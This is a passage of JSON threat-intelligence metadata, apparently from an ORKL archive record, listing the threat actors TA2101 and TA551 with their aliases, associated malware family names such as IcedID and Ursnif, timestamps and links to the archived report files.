			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8",
			"created_at": "2023-01-06T13:46:39.071873Z",
			"updated_at": "2026-04-10T02:00:03.203749Z",
			"deleted_at": null,
			"main_name": "TA2101",
			"aliases": [
				"GOLD VILLAGE",
				"Storm-0216",
				"DEV-0216",
				"UNC2198",
				"TUNNEL SPIDER",
				"Maze Team",
				"TWISTED SPIDER"
			],
			"source_name": "MISPGALAXY:TA2101",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434615,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.pdf",
		"text": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.txt",
		"img": "https://archive.orkl.eu/025d817f8987c48eabd3548f89554f47abb5bbd9.jpg"
	}
}